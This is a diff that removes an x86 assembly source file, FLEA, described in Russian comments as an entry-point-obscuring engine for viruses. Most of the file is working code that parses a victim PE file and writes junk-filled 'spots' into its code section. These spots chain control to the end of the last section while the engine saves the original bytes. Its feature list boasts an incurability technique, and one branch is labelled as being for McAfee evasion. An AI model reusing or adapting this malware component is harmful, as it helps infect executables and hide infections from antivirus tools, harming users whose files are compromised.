|
||||||
mov [edi], ah ; save byte
|
|
||||||
inc edi ; move up ptr
|
|
||||||
pop ecx
|
|
||||||
loop decompress_next ; go on decompressing
|
|
||||||
pop eax
|
|
||||||
ret
|
|
||||||
|
|
||||||
; BlueOwl 23 august, 2004
|
|
@ -1,775 +0,0 @@
|
|||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ;
|
|
||||||
; ;
|
|
||||||
; xxxxxxxxxxx xxxx xxxxxxxxxxx xxxxxxxxxx ;
|
|
||||||
; xxxxxxxxxxx xxxx xxxxxxxxxxx xxxx xxxx ;
|
|
||||||
; xxxx xxxx xxxx xxxx xxxx ;
|
|
||||||
; xxxx xxxx xxxx xxxx xxxx ;
|
|
||||||
; xxxxxxxxx xxxx xxxxxxxxx xxxx xxxx ;
|
|
||||||
; xxxxxxxxx xxxx xxxxxxxxx xxxx xx xxxx ;
|
|
||||||
; xxxx xxxx xxxx xxxx xx xxxx ;
|
|
||||||
; xxxx xxxx xxxx xxxx xxxx xxxx ;
|
|
||||||
; xxxx xxxxxxxxxxx xxxxxxxxxxx xxxx xxxx ;
|
|
||||||
; xxxx xxxxxxxxxxx xxxxxxxxxxx xxxx xxxx ;
|
|
||||||
; ;
|
|
||||||
; ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; UEP ENGINE ;
|
|
||||||
; FLEA ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ;
|
|
||||||
; :)! ;
|
|
||||||
; ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ;
|
|
||||||
; функция FLEA ;
|
|
||||||
; уеп(уёб) движок ;
|
|
||||||
; ;
|
|
||||||
; ;
|
|
||||||
;ВХОД: ;
|
|
||||||
;1 параметр (и единственный) - адрес структуры (UEPGEN) (ее описание смотри ниже) ;
|
|
||||||
;--------------------------------------------------------------------------------------------------------;
|
|
||||||
;ВЫХОД: ;
|
|
||||||
;EAX - абсолютный виртуальный адрес точки входа ;
|
|
||||||
;(а также самое главное: запись пятен в кодовую секцию с последующим сохранением оригинальных байт ;
|
|
||||||
;--------------------------------------------------------------------------------------------------------;
|
|
||||||
;ЗАМЕТКИ: ;
|
|
||||||
;структура, указатель на которую передан в качестве параметра, не портится, т.е. данные в ней после ;
|
|
||||||
;вызова данного движка остаются теми же. ;
|
|
||||||
; ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ;
|
|
||||||
; ! ;
|
|
||||||
; ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ;
|
|
||||||
; ОПИСАНИЕ СТРУКТУРЫ ;
|
|
||||||
; UEPGEN ;
|
|
||||||
; ;
|
|
||||||
; ;
|
|
||||||
;UEPGEN struct ;
|
|
||||||
; rgen_addr dd ? ;адрес Генератора Случайных Чисел (ГСЧ) ;
|
|
||||||
; tgen_addr dd ? ;адрес Генератора Мусорных Инструкций ;
|
|
||||||
; mapped_addr dd ? ;база мэппинга файла (MapViewOfFile) ;
|
|
||||||
; xsection dd ? ;IMAGE_SECTION_HEADER секции, в которую после после передать управление ;
|
|
||||||
; reserved1 dd ? ;зарезервировано ;
|
|
||||||
;MORPHGEN ends ;
|
|
||||||
; ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ;
|
|
||||||
; ОПИСАНИЕ СТРУКТУРЫ ;
|
|
||||||
; T2GEN ;
|
|
||||||
; (aka TRASHGEN) ;
|
|
||||||
; (более детальное описание смотри в движке xTG) ;
|
|
||||||
; ;
|
|
||||||
; ;
|
|
||||||
;TRASHGEN struct ;
|
|
||||||
; rgen_addr dd ? ;адрес Генератора Случайных Чисел (ГСЧ) ;
|
|
||||||
; buf_for_trash dd ? ;адрес (буфер), куда записывать генерируемое (хех, качественное) дерьмо ;
|
|
||||||
; size_trash dd ? ;размер (в байтах), сколько мусора записать ;
|
|
||||||
; regs dd ? ;занятые регистры (2 шт) ;
|
|
||||||
; xmask1 dd ? ;64-битная маска для генерации ;
|
|
||||||
; xmask2 dd ? ;мусорных команд (ака фильтр) ;
|
|
||||||
; beg_addr dd ? ;начальный адрес ;
|
|
||||||
; end_addr dd ? ;конечный адрес ;
|
|
||||||
; mapped_addr dd ? ;зарезервировано (либо база мэпинга (ака адрес файла в памяти)) ;
|
|
||||||
; reserv1 dd ? ;зарезервировано (хз, может когда-то там что и будет) ;
|
|
||||||
;TRASHGEN ends ;
|
|
||||||
; ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ;
|
|
||||||
; ! ;
|
|
||||||
; ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ;
|
|
||||||
; ПОЯСНЕНИЕ К ПОЛЯМ СТРУКТУРЫ UEPGEN: ;
|
|
||||||
; ;
|
|
||||||
; ;
|
|
||||||
;[ rgen_addr ] : ;
|
|
||||||
; так как данный движок (FLEA) разработан без привязки к какому-либо другому мотору, ;
|
|
||||||
; а для генерации мусора (и некоторых других фич) важен ГСЧ, поэтому адрес ГСЧ ;
|
|
||||||
; хранится в (данном) поле структуры. ;
|
|
||||||
; ВАЖНО: если мотор FLEA будет использовать другой ГСЧ (а не тот, который ;
|
|
||||||
; идет с ним в комплекте), надо, чтобы этот другой ГСЧ принимал в качестве 1-го ;
|
|
||||||
; (и единственного!) параметра в стэке число (назовем его N), так как поиск будет в ;
|
|
||||||
; диапазоне [0..n-1]. И на выходе другой ГСЧ должен возвращать в EAX случайное число. ;
|
|
||||||
; Остальные регистры должны остаться неизменными. Все. ;
|
|
||||||
;--------------------------------------------------------------------------------------------------------;
|
|
||||||
;[ tgen_addr ] : ;
|
|
||||||
; аналогично, как и с предыдущим полем структуры. Только тогда генератор мусора ;
|
|
||||||
; должен быть приведен к виду, как xTG (в ненужных полях можно передавать нули и все ;
|
|
||||||
; тип-топ). ;
|
|
||||||
;--------------------------------------------------------------------------------------------------------;
|
|
||||||
;[ mapped_addr ] : ;
|
|
||||||
; в этом поле хранится база мэппинга файла. Как пример, значение получаемое после ;
|
|
||||||
; вызова функи MapViewOfFile. ;
|
|
||||||
;--------------------------------------------------------------------------------------------------------;
|
|
||||||
;[ xsection ] : ;
|
|
||||||
; здесь передавать либо 0, либо IMAGE_SECTION_HEADER (в жертве) той секции, в ;
|
|
||||||
; которую после отработки должен будет передать управление данный uep-движок. ;
|
|
||||||
; Если здесь 0, то управление будет передано в конец последней секции. ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ;
|
|
||||||
; ЗАМЕТКИ ;
|
|
||||||
; ;
|
|
||||||
; ;
|
|
||||||
;1) для сокрытия точки входа (то есть для генерации пятен) следует вызвать (главную) функцию FLEA. ;
|
|
||||||
;2) для восстановления ранее сохраненных байт следует вызвать FLEA_RESTBYTES (возможно потребуется ;
|
|
||||||
; нужному участку памяти задать атрибуты страниц на чтение+запись). ;
|
|
||||||
;3) так как пятна представляют собой подфункции (с прологом, эпилогом, командой ret), и переход к ;
|
|
||||||
; следующему пятну осуществляется с помощью CALL'ов, то в стэке лежат разные значения. И чтобы после ;
|
|
||||||
; стэк сбалансировать, следует вызвать FLEA_RESTSTACK. ВАЖНО: перед вызовом функции FLEA_RESTSTACK, ;
|
|
||||||
; в стэке не должно быть уже никаких других данных. ;
|
|
||||||
; ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ;
|
|
||||||
; y0p! ;
|
|
||||||
; ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ;
|
|
||||||
; ФИЧИ ;
|
|
||||||
; ;
|
|
||||||
; ;
|
|
||||||
;(+) генерация рандомного числа пятен ;
|
|
||||||
; ;
|
|
||||||
;(+) пятна имеют рандомный размер, а также разный переход по пятнам (сверху вниз и наоборот) ;
|
|
||||||
; ;
|
|
||||||
;(+) техника неизлечимости ;
|
|
||||||
; ;
|
|
||||||
;(+) использование ГСЧ и Генератора Мусора (особенно своих, так это вообще охуительно) ;
|
|
||||||
; ;
|
|
||||||
;(+) базонезависимость ;
|
|
||||||
; ;
|
|
||||||
;(+) пятна выглядят как подфункции (с прологом, эпилогом, командой ret, а также возможно и fake winapi) ;
|
|
||||||
; ;
|
|
||||||
;(+) нет привязки к другим движкам (ГСЧ & trashgen можно юзать любой - условия читай выше;) ;
|
|
||||||
; * можно компилить как самостоятельный модуль; ;
|
|
||||||
; ;
|
|
||||||
;(+) не юзает WinAPI ;
|
|
||||||
; ;
|
|
||||||
;(+) управление можно передавать на любую секцию после отработки uep-движка (также опционально) ;
|
|
||||||
; ;
|
|
||||||
;(x) использует данные и дельта-смещение. ;
|
|
||||||
; ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ;
|
|
||||||
; y0p! ;
|
|
||||||
; ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ;
|
|
||||||
; ИСПОЛЬЗОВАНИЕ: ;
|
|
||||||
; ;
|
|
||||||
; ;
|
|
||||||
;1) Подключение: ;
|
|
||||||
; FLEA.asm ;
|
|
||||||
;2) Вызов (пример stdcall): ;
|
|
||||||
; ... ;
|
|
||||||
; szBuf db 100 dup (00h) ;
|
|
||||||
; ... ;
|
|
||||||
; lea ecx,szBuf ;
|
|
||||||
; assume ecx:ptr UEPGEN ;
|
|
||||||
; mov [ecx].rgen_addr,00401000h ;по этому адресу должен находиться ГСЧ ;
|
|
||||||
; mov [ecx].tgen_addr,00401300h ;по этому адресу должен находиться трэшген ;
|
|
||||||
; mov [ecx].mapped_addr,00330000h ;по этому адресу находится база мэппинга ;
|
|
||||||
; mov [ecx].xsection,0 ;ставим в ноль, значит уеп после передаст управление ;
|
|
||||||
; ;на конец последней секции ;
|
|
||||||
; ;остальные параметры обнулены. ;
|
|
||||||
; call FLEA ;вызываем полиморфный движок ;
|
|
||||||
; ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
;v1.0
|
|
||||||
;коменты обычно пишутся ночью, поэтому возможен бредняк в них.
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
;m1x
|
|
||||||
;pr0mix@mail.ru
|
|
||||||
;EOF
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
;========================================================================================================
|
|
||||||
;структуры
|
|
||||||
;========================================================================================================
|
|
||||||
UEPGEN struct
|
|
||||||
rgen_addr dd ?
|
|
||||||
tgen_addr dd ?
|
|
||||||
mapped_addr dd ?
|
|
||||||
xsection dd ?
|
|
||||||
reserved1 dd ?
|
|
||||||
UEPGEN ends
|
|
||||||
;--------------------------------------------------------------------------------------------------------
|
|
||||||
T2GEN struct ;
|
|
||||||
rgen_addr dd ? ;адрес Генератора Случайных Чисел (ГСЧ) ;
|
|
||||||
buf_for_trash dd ? ;адрес (буфер), куда записывать генерируемое (хех, качественное) дерьмо ;
|
|
||||||
size_trash dd ? ;размер (в байтах), сколько мусора записать ;
|
|
||||||
regs dd ? ;занятые регистры (2 шт) ;
|
|
||||||
xmask1 dd ? ;64-битная маска для генерации ;
|
|
||||||
xmask2 dd ? ;мусорных команд (ака фильтр) ;
|
|
||||||
beg_addr dd ? ;начальный адрес ;
|
|
||||||
end_addr dd ? ;конечный адрес ;
|
|
||||||
mapped_addr dd ? ;база мэпинга ;
|
|
||||||
reserv1 dd ? ;зарезервировано (хз, может когда-то там что и будет) ;
|
|
||||||
T2GEN ends ;
|
|
||||||
;========================================================================================================
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
MAX_SPOTS equ 10 ;максимальное кол-во генерируемых пятен
|
|
||||||
uportion1 equ 85 ;размер (в байтах) 1-ой порции мусора
|
|
||||||
uportion2 equ 50 ;размер (в байтах) 2-ой порции мусора
|
|
||||||
MIN_FIRST_PORTION equ uportion1-30 ;генерировать первую порцию мусора не меньше данного кол-ва байт
|
|
||||||
min_jmp equ uportion1+uportion2+7+10+30 ;расстояние минимальное
|
|
||||||
max_jmp equ min_jmp+200 ;расстояние максимальное
|
|
||||||
|
|
||||||
;далее идут значения для трэшгена
|
|
||||||
begin_address equ 0 ;начальный адрес (описание смотри в xTG.asm, либо ставь нули)
|
|
||||||
end_address equ 0 ;конечный адрес
|
|
||||||
mask_trash1 equ 00000000000011111111110101111001b ;маска для мусора
|
|
||||||
mask_trash2 equ 011110000b ;2-ая часть маски (разрешаем только генерацию фэйковых апишек)
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
FLEA: ;движок FLEA
|
|
||||||
pushad ;сохраняем регистры
|
|
||||||
cld
|
|
||||||
mov ebp,esp ;[ebp+00]
|
|
||||||
mov ebx,dword ptr [ebp+24h]
|
|
||||||
assume ebx:ptr UEPGEN ;ebx - указатель на структуру UEPGEN
|
|
||||||
mov esi,[ebx].mapped_addr
|
|
||||||
assume esi:ptr IMAGE_DOS_HEADER
|
|
||||||
add esi,[esi].e_lfanew
|
|
||||||
push esi ;[ebp-04] ;сохраняем указатель на IMAGE_NT_HEADERS
|
|
||||||
lodsd
|
|
||||||
assume esi:ptr IMAGE_FILE_HEADER
|
|
||||||
movzx ecx,[esi].NumberOfSections
|
|
||||||
movzx edx,[esi].SizeOfOptionalHeader
|
|
||||||
add esi,sizeof IMAGE_FILE_HEADER
|
|
||||||
assume esi:ptr IMAGE_OPTIONAL_HEADER
|
|
||||||
push [esi].AddressOfEntryPoint ;[ebp-08] ;сохраняем точку входа
|
|
||||||
push [esi].ImageBase ;[ebp-12] ;сохраняем базу
|
|
||||||
add esi,edx
|
|
||||||
assume esi:ptr IMAGE_SECTION_HEADER
|
|
||||||
sub esp,(sizeof T2GEN + 4 + 80) ;выделяем в стэке место для временных переменных и структуры T2GEN (aka TRASHGEN)
|
|
||||||
mov tgen_struct,esp
|
|
||||||
mov edx,esp
|
|
||||||
assume edx:ptr T2GEN
|
|
||||||
;--------------------------------------------------------------------------------------------------------
|
|
||||||
push mask_trash1 ;пофильтруем маску для генерации трэша
|
|
||||||
call gen_mask
|
|
||||||
or al,1
|
|
||||||
mov xtmask1,eax
|
|
||||||
push mask_trash2
|
|
||||||
call gen_mask
|
|
||||||
or eax,01110000b
|
|
||||||
mov xtmask2,eax
|
|
||||||
;--------------------------------------------------------------------------------------------------------
|
|
||||||
push [ebx].rgen_addr ;вначале заполним некоторые поля структуры TRASHGEN
|
|
||||||
pop [edx].rgen_addr
|
|
||||||
mov [edx].regs,0FFh
|
|
||||||
push xtmask1
|
|
||||||
pop [edx].xmask1
|
|
||||||
push xtmask2
|
|
||||||
pop [edx].xmask2
|
|
||||||
mov [edx].beg_addr,begin_address
|
|
||||||
mov [edx].end_addr,end_address
|
|
||||||
push [ebx].mapped_addr
|
|
||||||
pop [edx].mapped_addr
|
|
||||||
xor eax,eax
|
|
||||||
cdq
|
|
||||||
;--------------------------------------------------------------------------------------------------------
|
|
||||||
_search_new_ep_: ;далее начинаем поиск кодовой секции
|
|
||||||
cmp edx,[esi].VirtualAddress
|
|
||||||
ja _search_code_sec_
|
|
||||||
cmp eax,[esi].PointerToRawData
|
|
||||||
ja _search_code_sec_
|
|
||||||
mov edx,[esi].VirtualAddress ;а также сохраним новую точку входа (она будет указывать на конец последней секции)
|
|
||||||
mov eax,[esi].PointerToRawData
|
|
||||||
mov edi,[esi].SizeOfRawData
|
|
||||||
mov new_ep,edx
|
|
||||||
add new_ep,edi
|
|
||||||
;--------------------------------------------------------------------------------------------------------
|
|
||||||
_search_code_sec_:
|
|
||||||
push eax
|
|
||||||
mov eax,old_ep
|
|
||||||
mov edi,[esi].VirtualAddress
|
|
||||||
cmp edi,eax;old_ep
|
|
||||||
ja _nextsection_
|
|
||||||
cmp [esi].Misc.VirtualSize,0
|
|
||||||
jne _vsok_
|
|
||||||
add edi,[esi].SizeOfRawData
|
|
||||||
jmp _psok_
|
|
||||||
_vsok_:
|
|
||||||
add edi,[esi].Misc.VirtualSize
|
|
||||||
_psok_:
|
|
||||||
cmp edi,eax
|
|
||||||
jbe _nextsection_
|
|
||||||
sub eax,[esi].VirtualAddress
|
|
||||||
add eax,[esi].PointerToRawData
|
|
||||||
add eax,[ebx].mapped_addr
|
|
||||||
mov start_addr,eax ;если нашли кодовую секцию, то сохраним физический адрес точки входа, т.к. отсюда и начнем клепать пятна
|
|
||||||
mov codesec,esi ;а также сохраним аказатель в табличке секций на кодовую секцию
|
|
||||||
_nextsection_:
|
|
||||||
pop eax
|
|
||||||
add esi,sizeof IMAGE_SECTION_HEADER
|
|
||||||
loop _search_new_ep_
|
|
||||||
;--------------------------------------------------------------------------------------------------------
|
|
||||||
mov esi,codesec ;после вычислим конец кодовой секции
|
|
||||||
mov eax,[esi].SizeOfRawData
|
|
||||||
cmp eax,[esi].Misc.VirtualSize
|
|
||||||
jbe _sizecsok_
|
|
||||||
cmp [esi].Misc.VirtualSize,0
|
|
||||||
je _sizecsok_
|
|
||||||
mov eax,[esi].Misc.VirtualSize
|
|
||||||
|
|
||||||
_sizecsok_:
|
|
||||||
add eax,[esi].VirtualAddress
|
|
||||||
sub eax,old_ep
|
|
||||||
mov size_codesec,eax
|
|
||||||
add eax,old_ep
|
|
||||||
mov max_codesec_addr,eax
|
|
||||||
mov edi,imNTh
|
|
||||||
assume edi:ptr IMAGE_NT_HEADERS
|
|
||||||
;--------------------------------------------------------------------------------------------------------
|
|
||||||
_maxvacs_: ;далее, найдем максимальный адрес, и получится отрезок:
|
|
||||||
;[физич. адрес точки входа ; максимальный адрес в кодовой секции]
|
|
||||||
;и в этом отрезке будем записывать пятна. Иначе в кодовой секции могут быть директории импорта, tls и т.д.
|
|
||||||
;И если мы перепишем их своими пятнами, то будет пыцдэт файлу
|
|
||||||
mov eax,[edi].OptionalHeader.DataDirectory[ecx*8].VirtualAddress
|
|
||||||
cmp old_ep,eax
|
|
||||||
ja _nextdatadir_
|
|
||||||
cmp max_codesec_addr,eax
|
|
||||||
jb _nextdatadir_
|
|
||||||
mov max_codesec_addr,eax
|
|
||||||
_nextdatadir_:
|
|
||||||
inc ecx
|
|
||||||
cmp ecx,15
|
|
||||||
jne _maxvacs_
|
|
||||||
;--------------------------------------------------------------------------------------------------------
|
|
||||||
mov eax,max_codesec_addr
|
|
||||||
sub eax,[esi].VirtualAddress
|
|
||||||
add eax,[esi].PointerToRawData
|
|
||||||
add eax,[ebx].mapped_addr
|
|
||||||
mov max_codesec_addr,eax ;получаем максимальный физический адрес в кодовой секции
|
|
||||||
;Так, теперь диапазон у нас есть
|
|
||||||
mov eax,start_addr
|
|
||||||
mov cur_codesec_addr,eax
|
|
||||||
|
|
||||||
push MAX_SPOTS
|
|
||||||
call [ebx].rgen_addr ;рэндомно получаем, сколько пятен сгенерим и запишем в кодовую секцию
|
|
||||||
inc eax
|
|
||||||
mov num_spots,eax
|
|
||||||
|
|
||||||
call _delta_uep_
|
|
||||||
_delta_uep_:
|
|
||||||
pop eax
|
|
||||||
sub eax,_delta_uep_
|
|
||||||
lea ecx,[restore_bytes+eax]
|
|
||||||
mov beg_rest_bytes,ecx ;в этот буфер будем сохранять оригинальные байты из кодовой секции (которые перепишем пятнами)
|
|
||||||
|
|
||||||
xor ecx,ecx
|
|
||||||
;--------------------------------------------------------------------------------------------------------
|
|
||||||
_nextaddrforspots_:
|
|
||||||
call get_jmpaddr ;получим адрес очередного пятна, на которое прыгнем
|
|
||||||
add eax,cur_codesec_addr
|
|
||||||
push eax
|
|
||||||
add eax,(uportion1+uportion2+7+10) ;прибавим 2 порции мусора + max размер (mov reg,<address> call reg) (7 byte) + размер пролога и эпилога для каждого пятнышка (6 byte + 3 byte) + размер команды ret (+1 byte)
|
|
||||||
cmp eax,max_codesec_addr ;и сравним с максимальный допустимым адресом
|
|
||||||
pop eax
|
|
||||||
jae _alladdrforspots_ ;если больше макс. адреса, то пятна больше не варик генерить, и выходим из цикла
|
|
||||||
push eax ;иначе сохраняем в стэке адрес
|
|
||||||
mov cur_codesec_addr,eax ;сделаем текущим адресом проверки адрес для нового пятна
|
|
||||||
inc ecx
|
|
||||||
cmp ecx,num_spots
|
|
||||||
jne _nextaddrforspots_
|
|
||||||
_alladdrforspots_:
|
|
||||||
mov num_spots,ecx ;сохраним кол-во пятен, которые точно можно записать в кодовой секции
|
|
||||||
;--------------------------------------------------------------------------------------------------------
|
|
||||||
cmp cl,1
|
|
||||||
push 0
|
|
||||||
pop eax
|
|
||||||
jb _enduep_ ;если ноль пятен, то выходим из движка
|
|
||||||
mov eax,esp
|
|
||||||
push start_addr ;будем перемешивать все полученные адреса пятен, кроме первого
|
|
||||||
je _nomixaddr_
|
|
||||||
;--------------------------------------------------------------------------------------------------------
|
|
||||||
push ecx
|
|
||||||
push eax
|
|
||||||
call mix_addr ;перемешаем адреса пятен
|
|
||||||
|
|
||||||
_nomixaddr_:
|
|
||||||
xor edx,edx
|
|
||||||
mov edi,beg_rest_bytes
|
|
||||||
stosb ;в 1-ом байте будет храниться кол-во пятен. Пока пропустим его
|
|
||||||
mov cur_rest_bytes,edi
|
|
||||||
;--------------------------------------------------------------------------------------------------------
|
|
||||||
_genspot_:
|
|
||||||
mov edi,cur_rest_bytes
|
|
||||||
_portion1_:
|
|
||||||
push uportion1
|
|
||||||
call [ebx].rgen_addr
|
|
||||||
cmp eax,MIN_FIRST_PORTION
|
|
||||||
jb _portion1_
|
|
||||||
mov spot1,eax
|
|
||||||
xchg eax,ecx
|
|
||||||
push uportion2
|
|
||||||
call [ebx].rgen_addr
|
|
||||||
mov spot2,eax
|
|
||||||
add ecx,eax
|
|
||||||
add ecx,(7+10) ;max_size (mov reg,<address> call reg) (7 byte) + prologue (6 byte) + epilogue (3 byte) + ret (1 byte)
|
|
||||||
mov eax,ecx
|
|
||||||
stosd ;сначала сохраним в спец. буфере размер очередного пятна (это 1-ая порция мусора + jmp + 2-ая порция мусора)
|
|
||||||
mov eax,dword ptr [esp]
|
|
||||||
mov esi,codesec
|
|
||||||
sub eax,[ebx].mapped_addr
|
|
||||||
sub eax,[esi].PointerToRawData
|
|
||||||
add eax,[esi].VirtualAddress
|
|
||||||
add eax,base
|
|
||||||
stosd ;и сохраним следом абослютный виртуальный адрес, куда после будем восстанавливать ранее сохраненные байты
|
|
||||||
mov esi,dword ptr [esp]
|
|
||||||
rep movsb ;а после сохраним байты, на место которых запишем пятно
|
|
||||||
mov cur_rest_bytes,edi
|
|
||||||
pop edi
|
|
||||||
push edx
|
|
||||||
mov edx,tgen_struct
|
|
||||||
;--------------------------------------------------------------------------------------------------------
|
|
||||||
mov [edx].buf_for_trash,edi
|
|
||||||
mov [edx].size_trash,6 ;размер пролога
|
|
||||||
mov [edx].xmask1,0b
|
|
||||||
mov [edx].xmask2,100b ;в маске разрешаем генерацию только пролога (для другого генератора мусора здесь возможна генерация порции мусора)
|
|
||||||
push edx
|
|
||||||
call [ebx].tgen_addr ;запишем пролог (push ebp mov ebp,esp sub esp,0xXX)
|
|
||||||
push xtmask1
|
|
||||||
pop [edx].xmask1
|
|
||||||
push xtmask2
|
|
||||||
pop [edx].xmask2
|
|
||||||
;--------------------------------------------------------------------------------------------------------
|
|
||||||
mov [edx].buf_for_trash,eax
|
|
||||||
mov eax,spot1
|
|
||||||
mov [edx].size_trash,eax
|
|
||||||
push edx
|
|
||||||
call [ebx].tgen_addr ;запишем первую порцию мусора
|
|
||||||
xchg eax,edi
|
|
||||||
push edi
|
|
||||||
add edi,5
|
|
||||||
mov eax,dword ptr [esp+04]
|
|
||||||
cmp eax,num_spots ;проверим, остался последний адрес для записи пятна?
|
|
||||||
jne _nextspot_ ;если да, тогда запишем финальное пятно, jmp в котором будет указывать на последнюю секцию, а не на очередное пятно
|
|
||||||
;********************************************************************************************************
|
|
||||||
comment %
|
|
||||||
;запись финального пятна
|
|
||||||
mov esi,codesec ;с помощью нехитрой формулы посчитаем операнд для jmp (0xE9)
|
|
||||||
sub edi,[ebx].mapped_addr
|
|
||||||
sub edi,[esi].PointerToRawData
|
|
||||||
add edi,[esi].VirtualAddress
|
|
||||||
mov ecx,[ebx].xsection
|
|
||||||
jecxz _notxsec_
|
|
||||||
assume ecx:ptr IMAGE_SECTION_HEADER
|
|
||||||
sub edi,[ecx].VirtualAddress
|
|
||||||
sub edi,[ecx].SizeOfRawData ;здесь строим call near (0xE8 0xXX 0xXX 0xXX 0xXX)
|
|
||||||
jmp _finalcall_
|
|
||||||
_notxsec_:
|
|
||||||
sub edi,new_ep
|
|
||||||
_finalcall_:
|
|
||||||
neg edi
|
|
||||||
xchg edi,dword ptr [esp]
|
|
||||||
mov al,0E8h ;0E9h ;CALL NEAR 0xXXXXXXXX (0xE8 0xXX 0xXX 0xXX 0xXX)
|
|
||||||
stosb
|
|
||||||
pop eax
|
|
||||||
stosd
|
|
||||||
;%
|
|
||||||
|
|
||||||
;comment ! ;for mcafe
|
|
||||||
mov edi,new_ep
|
|
||||||
mov ecx,[ebx].xsection
|
|
||||||
jecxz _notxsec_ ;если поле пустое, значит управление после уепа передаем в конец последней секции
|
|
||||||
assume ecx:ptr IMAGE_SECTION_HEADER
|
|
||||||
mov edi,[ecx].VirtualAddress
|
|
||||||
add edi,[ecx].SizeOfRawData
|
|
||||||
_notxsec_:
|
|
||||||
add edi,base ;а здесь строим
|
|
||||||
xchg edi,dword ptr [esp]
|
|
||||||
mov al,0B8h ;mov reg32,<address>
|
|
||||||
stosb
|
|
||||||
pop eax
|
|
||||||
stosd
|
|
||||||
mov al,0FFh ;call reg32
|
|
||||||
stosb
|
|
||||||
mov al,0D0h
|
|
||||||
stosb
|
|
||||||
;!
|
|
||||||
mov [edx].buf_for_trash,edi
|
|
||||||
mov eax,spot2
|
|
||||||
mov [edx].size_trash,eax
|
|
||||||
push edx
|
|
||||||
call [ebx].tgen_addr ;2-ая порция мусора для финального пятна
|
|
||||||
;--------------------------------------------------------------------------------------------------------
|
|
||||||
mov [edx].buf_for_trash,eax
|
|
||||||
mov [edx].size_trash,3 ;размер эпилога
|
|
||||||
mov [edx].xmask1,0b
|
|
||||||
mov [edx].xmask2,1000b ;в маске разрешаем генерацию только эпилога (для другого генератора мусора здесь возможна генерация очередной порции мусора)
|
|
||||||
push edx
|
|
||||||
call [ebx].tgen_addr ;запишем эпилог для финального пятна (mov esp,ebp pop ebp)
|
|
||||||
mov byte ptr [eax],0C3h ;и запишем ret
|
|
||||||
;--------------------------------------------------------------------------------------------------------
|
|
||||||
pop edx
|
|
||||||
jmp _endspot_ ;выходим из цикла
|
|
||||||
;********************************************************************************************************
|
|
||||||
;запись очередного пятна
|
|
||||||
_nextspot_:
|
|
||||||
sub edi,dword ptr [esp+08] ;следующий адрес
|
|
||||||
neg edi
|
|
||||||
xchg edi,dword ptr [esp]
|
|
||||||
mov al,0E8h ;CALL NEAR (0xE8 0xXX 0xXX 0xXX 0xXX)
|
|
||||||
stosb
|
|
||||||
pop eax
|
|
||||||
stosd
|
|
||||||
mov [edx].buf_for_trash,edi
|
|
||||||
mov eax,spot2
|
|
||||||
mov [edx].size_trash,eax
|
|
||||||
push edx
|
|
||||||
